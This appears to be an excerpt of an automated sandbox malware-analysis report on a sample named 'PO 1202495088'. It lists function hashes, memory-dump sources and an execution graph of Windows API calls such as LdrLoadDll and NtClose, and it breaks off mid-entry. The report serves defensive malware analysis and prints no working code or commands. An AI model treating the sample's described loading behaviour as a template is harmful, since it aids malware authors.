                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff5dd4b1bc02087fd8abd7a5a0b1d405e227ff98b85b0220cb109c47a0b523e
                                                                                          • Instruction ID: b35c4f80e3ec5b155ea392b79f618318175862988fb004c4504f20cd1d8cd04b
                                                                                          • Opcode Fuzzy Hash: 5ff5dd4b1bc02087fd8abd7a5a0b1d405e227ff98b85b0220cb109c47a0b523e
                                                                                          • Instruction Fuzzy Hash: 1EE1E7B4E001598FCB14CFA9C5809AEFBB2FF89304F248169E515AB355DB31AD42CFA1
                                                                                          Function 075F4830 Relevance: .3, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f784f2d481fca24207f67a6263b429f1d867d0068570c09853f8fe476d8970d
                                                                                          • Instruction ID: 2a9267a1f6a7a743c47c1bd4c9c1c3a02fb26c65d0fef88a68eb810eccc886d8
                                                                                          • Opcode Fuzzy Hash: 7f784f2d481fca24207f67a6263b429f1d867d0068570c09853f8fe476d8970d
                                                                                          • Instruction Fuzzy Hash: A4E1F7B4E001598FCB14CFA9C580AAEFBB2FF89304F248169D555AB356DB30AD42CF61
                                                                                          Function 075F64A8 Relevance: .3, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 719c7708a7ab412b5cb3c39bd7cf7e1472966fc897d8329c79c67fbacae6bc27
                                                                                          • Instruction ID: 22878f33dbf57f744002388762b9371df54ddefcf6f53f7c2e0c3e6c1fce6df1
                                                                                          • Opcode Fuzzy Hash: 719c7708a7ab412b5cb3c39bd7cf7e1472966fc897d8329c79c67fbacae6bc27
                                                                                          • Instruction Fuzzy Hash: 19E1E6B4E001198FDB14DFA9C5809AEBBF2FF89304F248169E515AB355DB31AD42CFA1
                                                                                          Function 030ED16B Relevance: .3, Instructions: 270COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a9af6a58f70f08550cdf7c8a9c7bebade99310672575aea44c2797abd655bc7
                                                                                          • Instruction ID: 94c4e2d08039f9fb17affa2a14978b64db1680d8a6967ba7adbfe72c70200312
                                                                                          • Opcode Fuzzy Hash: 1a9af6a58f70f08550cdf7c8a9c7bebade99310672575aea44c2797abd655bc7
                                                                                          • Instruction Fuzzy Hash: 7DB1F875E06209DFDB18CFA6D58069EFBB2FF99300F24942AD415AB254EB349A46CF10
                                                                                          Function 030E6E39 Relevance: .2, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9037a27aa4c4d569b734d82dae4078e9f4e4661c524be8b56030f3fa19eb53dc
                                                                                          • Instruction ID: f2def915002da4641606d8c794df7e78efb467a2199e3ff1d0089a41cc2ac64f
                                                                                          • Opcode Fuzzy Hash: 9037a27aa4c4d569b734d82dae4078e9f4e4661c524be8b56030f3fa19eb53dc
                                                                                          • Instruction Fuzzy Hash: E581F274A1520ACFCB44CFA9D98499EFBF1FF88310B24996AD415AB360D330AA42CF51
                                                                                          Function 030E6E48 Relevance: .2, Instructions: 196COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1bb8a6901669644e104aef0c3d4e4b290add75a9370ac6eaa46b093a4d90e90
                                                                                          • Instruction ID: c9b8653ff07bd696aacdd213bfcb147ff2dc8afd478974f477ab7272f5f4c251
                                                                                          • Opcode Fuzzy Hash: f1bb8a6901669644e104aef0c3d4e4b290add75a9370ac6eaa46b093a4d90e90
                                                                                          • Instruction Fuzzy Hash: A891C074A1521ACFCB04CFA9D58499EFBF2FF88310F24996AD415AB364D331AA42CF51
                                                                                          Function 030E8248 Relevance: .2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6896b916de70a5093b9b03907eaa565f9cbb9909e63e9f95fcb7f4183499ac1
                                                                                          • Instruction ID: 416a86f6eea514c099d5f712944f13a1a73a101c4dc21ab8689121d5d86aa644
                                                                                          • Opcode Fuzzy Hash: f6896b916de70a5093b9b03907eaa565f9cbb9909e63e9f95fcb7f4183499ac1
                                                                                          • Instruction Fuzzy Hash: BB71F874E16A098FCB04CFA9C9805DEFBF2FF89610F24D46AD415BB354D3359A428B64
                                                                                          Function 030E8258 Relevance: .2, Instructions: 173COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9d0cc943916bf601ad337b8e92bb2cd4b46d4f5d6688475ae4afc5f60b55e84
                                                                                          • Instruction ID: 3eaefd0e8f2a1116856540b0fa2dd8b4c667d11c43ed77e7d70e3a35beddcf65
                                                                                          • Opcode Fuzzy Hash: c9d0cc943916bf601ad337b8e92bb2cd4b46d4f5d6688475ae4afc5f60b55e84
                                                                                          • Instruction Fuzzy Hash: 2F71B474E16A09CFCB04CFA9C5805DEFBF2FF89610F24946AD415BB354D3359A428B68
                                                                                          Function 075F6498 Relevance: .1, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7cb673ff6119d1fc698a75075e25bd8c663f5575d316e13e57b289b0f7243e2e
                                                                                          • Instruction ID: 9155c17f9fe298dbb2e83192d9de447e58388e41212abf932aa7a639346e507c
                                                                                          • Opcode Fuzzy Hash: 7cb673ff6119d1fc698a75075e25bd8c663f5575d316e13e57b289b0f7243e2e
                                                                                          • Instruction Fuzzy Hash: AA51F9B4E002198FCB14DFA9D5809AEFBF2FF89304F24816AD519AB355D7319942CFA1
                                                                                          Function 030E84D9 Relevance: .1, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 46c18877544d8ac7684b2d5fc45e99e7906cc05eff31eb36e6f1a45552399847
                                                                                          • Instruction ID: 74fcd067cd0b6d7f0aa59f620135ca4edfa529d2733ea10b386cdba09e02d6d7
                                                                                          • Opcode Fuzzy Hash: 46c18877544d8ac7684b2d5fc45e99e7906cc05eff31eb36e6f1a45552399847
                                                                                          • Instruction Fuzzy Hash: 754128B2E0660A9FCB44CFA9C5815AEFBF2FF88640F24C56AC415E7354E7309A418F95
                                                                                          Function 030E84E8 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 01b0a946ee58b49d0235d605c8f8cb3b03fbcf2edf358804d98702235a54d6e1
                                                                                          • Instruction ID: 75d70507ae31c46de1f0778e38258991dd4205e9aec8a28a71c577a8a286a91a
                                                                                          • Opcode Fuzzy Hash: 01b0a946ee58b49d0235d605c8f8cb3b03fbcf2edf358804d98702235a54d6e1
                                                                                          • Instruction Fuzzy Hash: A541E5B1E0660ADFCB44CFAAC5815AEFBF2BF88640F24D56AC415B7214D7309A418FA4
                                                                                          Function 030E8041 Relevance: .1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca707790f3ded578f579af8a95c18b6345a4480f825bfda90118c5eb63b76772
                                                                                          • Instruction ID: 9429a79aceae02f3b223efea9259c42ad39a6637167d5c1ce8174be638958eca
                                                                                          • Opcode Fuzzy Hash: ca707790f3ded578f579af8a95c18b6345a4480f825bfda90118c5eb63b76772
                                                                                          • Instruction Fuzzy Hash: DF41E8B1E0560A9FDB48CFAAD8815AEFBF2BF89700F14C46AD415B7254D3349A42CF94
                                                                                          Function 030EB8F8 Relevance: .1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 967e54ea70e870f0e34e62b5a2e8dbc1e7036d03aa9c9e53ade86c0a469ba548
                                                                                          • Instruction ID: 8a5e06a2bc56e973973edd1bd1e425e181880a50811995538194e9ea2f2c0425
                                                                                          • Opcode Fuzzy Hash: 967e54ea70e870f0e34e62b5a2e8dbc1e7036d03aa9c9e53ade86c0a469ba548
                                                                                          • Instruction Fuzzy Hash: 5441FB70E0A60ADFCB44CFA6D5416AEFBF1EB89204F24986AC009B7264E37497418B94
                                                                                          Function 030EB8E8 Relevance: .1, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e3bdd1c867c94957872a911d68a3d8d3dd3dcff4be7109b0b77a7f1aedf4f376
                                                                                          • Instruction ID: 0bd9162d9e6e2cf87abd3a5f1fe4178e0aa44c34f4c9047385aca67c5afbc2fc
                                                                                          • Opcode Fuzzy Hash: e3bdd1c867c94957872a911d68a3d8d3dd3dcff4be7109b0b77a7f1aedf4f376
                                                                                          • Instruction Fuzzy Hash: E7412E70E0A20ADFDB44CFA5D5416AEFBF2EF89304F14D86AC405B7264E37487418B95
                                                                                          Function 030E8050 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0456ade193aa74cbaec0ade547540661926164c7524fdb0d6efff2f0316d8b45
                                                                                          • Instruction ID: 176ff534cd5d5d258ca5c2a1616603c054f0227804d95f1e05f21616114509dd
                                                                                          • Opcode Fuzzy Hash: 0456ade193aa74cbaec0ade547540661926164c7524fdb0d6efff2f0316d8b45
                                                                                          • Instruction Fuzzy Hash: E141C2B4E0660ADFCB48CFAAD8815AEFBF2BF88700F14C46AC415B7254D7359A418F94
                                                                                          Function 030E32A0 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 055a0d694b8f790b6db50578c338ec129fec1dcf32ec3f8e94b8b8c6a8e80602
                                                                                          • Instruction ID: 8a42ad9d2f5c24085ed44d648e7e92b841af6e1acbcb2f2c539acb9b675ef4fd
                                                                                          • Opcode Fuzzy Hash: 055a0d694b8f790b6db50578c338ec129fec1dcf32ec3f8e94b8b8c6a8e80602
                                                                                          • Instruction Fuzzy Hash: 9E21CA71E056589FEB18CFAB984469EFFF3AFC9200F08C1BAC518AB255D77005568F51
                                                                                          Function 075F9B9D Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccfdd4727b6b3e0258bb82a5fdf2487c812e413f1af9946fc5efa8a18d7b4092
                                                                                          • Instruction ID: 54ecdd0ded56c2817089d0a002fdc844a692ab51ed756db7bf795bd9a1bfe0fc
                                                                                          • Opcode Fuzzy Hash: ccfdd4727b6b3e0258bb82a5fdf2487c812e413f1af9946fc5efa8a18d7b4092
                                                                                          • Instruction Fuzzy Hash: B8D0A7A185E2C49FC7035A7034250F4FF3C7547016F0574C3D64DD70539216410D4226

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.4%
                                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                                          Signature Coverage:8.3%
                                                                                          Total number of Nodes:144
                                                                                          Total number of Limit Nodes:10
                                                                                          execution_graph 89389 425013 89390 42502f 89389->89390 89391 425057 89390->89391 89392 42506b 89390->89392 89393 42ccc3 NtClose 89391->89393 89394 42ccc3 NtClose 89392->89394 89395 425060 89393->89395 89396 425074 89394->89396 89399 42ee73 89396->89399 89398 42507f 89402 42cfd3 89399->89402 89401 42ee90 89401->89398 89403 42cfed 89402->89403 89404 42cffe RtlAllocateHeap 89403->89404 89404->89401 89413 42c2d3 89414 42c2ed 89413->89414 89417 13f2d10 LdrInitializeThunk 89414->89417 89415 42c315 89417->89415 89445 4253a3 89447 4253bc 89445->89447 89446 425404 89448 42ed53 RtlFreeHeap 89446->89448 89447->89446 89450 425444 89447->89450 89452 425449 89447->89452 89449 425414 89448->89449 89451 42ed53 RtlFreeHeap 89450->89451 89451->89452 89453 42fdf3 89454 42fe03 89453->89454 89455 42fe09 89453->89455 89456 42ee33 RtlAllocateHeap 89455->89456 89457 42fe2f 89456->89457 89269 414703 89270 41471c 89269->89270 89275 417eb3 89270->89275 89272 41473a 89273 414773 PostThreadMessageW 89272->89273 89274 414786 89272->89274 89273->89274 89276 417ed7 89275->89276 89277 417f13 LdrLoadDll 89276->89277 89278 417ede 89276->89278 89277->89278 89278->89272 89279 416083 89280 416084 89279->89280 89281 417eb3 LdrLoadDll 89280->89281 89282 4160de 89281->89282 89284 416100 89282->89284 89285 419c13 89282->89285 89286 419c46 89285->89286 89287 419c6a 89286->89287 89292 42c843 89286->89292 89287->89284 89290 419c8d 89290->89287 89296 42ccc3 89290->89296 89291 419d0f 89291->89284 89293 42c860 89292->89293 89299 13f2bc0 LdrInitializeThunk 89293->89299 89294 42c88c 89294->89290 89297 42ccdd 89296->89297 89298 42ccee NtClose 89297->89298 89298->89291 89299->89294 89418 41ac53 89419 41acc5 89418->89419 89420 41ac6b 89418->89420 89420->89419 89422 41eba3 89420->89422 89423 41ebc9 89422->89423 89427 41ecbd 89423->89427 89428 42ff23 89423->89428 89425 41ec5b 89426 42c323 LdrInitializeThunk 89425->89426 89425->89427 89426->89427 89427->89419 89429 42fe93 89428->89429 89431 42fef0 89429->89431 89434 42ee33 89429->89434 89431->89425 89432 42fecd 89433 42ed53 RtlFreeHeap 89432->89433 89433->89431 89435 42cfd3 RtlAllocateHeap 89434->89435 89436 42ee4e 89435->89436 89436->89432 89437 414193 89440 42cf33 89437->89440 89441 42cf4d 89440->89441 89444 13f2b90 LdrInitializeThunk 89441->89444 89442 4141b5 89444->89442 89300 401d0d 89301 401d17 89300->89301 89304 4302c3 89301->89304 89307 42e903 89304->89307 89308 42e929 89307->89308 89319 407703 89308->89319 89310 42e93f 89311 401e16 89310->89311 89322 41b7c3 89310->89322 89313 42e95e 89314 42e973 89313->89314 89337 42d073 89313->89337 89333 4288d3 89314->89333 89317 42e98d 89318 42d073 ExitProcess 89317->89318 89318->89311 89340 416b73 89319->89340 89321 407710 89321->89310 89323 41b7ef 89322->89323 89364 41b6b3 89323->89364 89326 41b834 89329 41b850 89326->89329 89331 42ccc3 NtClose 89326->89331 89327 41b81c 89328 41b827 89327->89328 89330 42ccc3 NtClose 89327->89330 89328->89313 89329->89313 89330->89328 89332 41b846 89331->89332 89332->89313 89334 428935 89333->89334 89336 428942 89334->89336 89375 418d33 89334->89375 89336->89317 89338 42d090 89337->89338 89339 42d0a1 ExitProcess 89338->89339 89339->89314 89341 416b8d 89340->89341 89343 416ba6 89341->89343 89344 42d6f3 89341->89344 89343->89321 89346 42d70d 89344->89346 89345 42d73c 89345->89343 89346->89345 89351 42c323 89346->89351 89352 42c340 89351->89352 89358 13f2b2a 89352->89358 89353 42c36c 89355 42ed53 89353->89355 89361 42d023 89355->89361 89357 42d7b5 89357->89343 89359 13f2b3f LdrInitializeThunk 89358->89359 89360 13f2b31 89358->89360 89359->89353 89360->89353 89362 42d040 89361->89362 89363 42d051 RtlFreeHeap 89362->89363 89363->89357 89365 41b6cd 89364->89365 89369 41b7a9 89364->89369 89370 42c3c3 89365->89370 89368 42ccc3 NtClose 89368->89369 89369->89326 89369->89327 89371 42c3dd 89370->89371 89374 13f34e0 LdrInitializeThunk 89371->89374 89372 41b79d 89372->89368 89374->89372 89376 418d5d 89375->89376 89382 41925b 89376->89382 89383 414373 89376->89383 89378 418e8a 89379 42ed53 RtlFreeHeap 89378->89379 89378->89382 89380 418ea2 89379->89380 89381 42d073 ExitProcess 89380->89381 89380->89382 89381->89382 89382->89336 89387 414393 89383->89387 89385 4143fc 89385->89378 89386 4143f2 89386->89378 89387->89385 89388 41bad3 RtlFreeHeap LdrInitializeThunk 89387->89388 89388->89386 89458 13f2a80 LdrInitializeThunk

                                                                                          Executed Functions

                                                                                          Function 00417EB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 293 417eb3-417ecf 294 417ed7-417edc 293->294 295 417ed2 call 42f933 293->295 296 417ee2-417ef0 call 42ff33 294->296 297 417ede-417ee1 294->297 295->294 300 417f00-417f11 call 42e3d3 296->300 301 417ef2-417efd call 4301d3 296->301 306 417f13-417f27 LdrLoadDll 300->306 307 417f2a-417f2d 300->307 301->300 306->307
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F25
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
                                                                                          • Instruction ID: 74b1a67ad7a1e6c5496c2b823323dd79b328b320fcbdb6ab911308b9a49c7e9b
                                                                                          • Opcode Fuzzy Hash: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
                                                                                          • Instruction Fuzzy Hash: 65011EB5E4020DABDF10DAA5DC42FDEB3B8AB54308F0041AAED0897241F675EB598B95
                                                                                          Function 0042CCC3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 318 42ccc3-42ccfc call 404b43 call 42ded3 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCF7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
                                                                                          • Instruction ID: 7dd1565d8f3dbc3bc04d904a055674cb4cb7d7fe92152ebc39fafefd714ea547
                                                                                          • Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
                                                                                          • Instruction Fuzzy Hash: A8E04F316006147BE610AA6ADC41FD7776CDFC5714F408419FA08A7181C670B91187F4
                                                                                          Function 013F2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 45eb06138c88c7f788cd15198a4e9f1e96ca79f168df4c8837a219c6e48f8f88
                                                                                          • Instruction ID: 067aaa8fc4fbc7b02b208201356a384378a7d2edb2f40bb542e02a758dbf2f7b
                                                                                          • Opcode Fuzzy Hash: 45eb06138c88c7f788cd15198a4e9f1e96ca79f168df4c8837a219c6e48f8f88
                                                                                          • Instruction Fuzzy Hash: A990023260148902D5117159960474A000597D0301F55C826A441465DDC7B589917121
                                                                                          Function 013F2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 4f0aa565dedfb45b1c08805c3232f1e458d1f7ee0f00184cb2073a8994233f15
                                                                                          • Instruction ID: 1019575995f818d0b588d78709354e427618e4df7f00c837d3540968f23fca5b
                                                                                          • Opcode Fuzzy Hash: 4f0aa565dedfb45b1c08805c3232f1e458d1f7ee0f00184cb2073a8994233f15
                                                                                          • Instruction Fuzzy Hash: 4790023260140502D50175996608646000597E0301F51D426A501455AEC77589917131
                                                                                          Function 013F2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 332 13f2a80-13f2a8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 769827621fe3ccbf47b58cfe1317455de7efff2524dd20d7f5b5c2df75585cf2
                                                                                          • Instruction ID: 572e6caff69bf1553da5b7ae3a06d1cd2108dfab820c5833f054a5d3988ec51c
                                                                                          • Opcode Fuzzy Hash: 769827621fe3ccbf47b58cfe1317455de7efff2524dd20d7f5b5c2df75585cf2
                                                                                          • Instruction Fuzzy Hash: B190026260240103450671595614616400A97E0301B51C436E1004595DC63589917125
                                                                                          Function 013F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a391097b66c943e2bf031674a3cae7df1a238d26339d103ada9bcaa4f391d3d6
                                                                                          • Instruction ID: 0439339e2a657cc26abd9c55bbf9572fc0fd55f646d0eaa17a6c1f2fc4c7fb42
                                                                                          • Opcode Fuzzy Hash: a391097b66c943e2bf031674a3cae7df1a238d26339d103ada9bcaa4f391d3d6
                                                                                          • Instruction Fuzzy Hash: 1990023260140513D51271595704707000997D0341F91C827A041455DDD7768A52B121
                                                                                          Function 013F2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: fa5829be2d6eb154383cb23535c4947cf9fe600585339082a8d573289889c6d0
                                                                                          • Instruction ID: 101b17bac3ba384887fbc355053552c4860f27762d084637f0dff09f17600f40
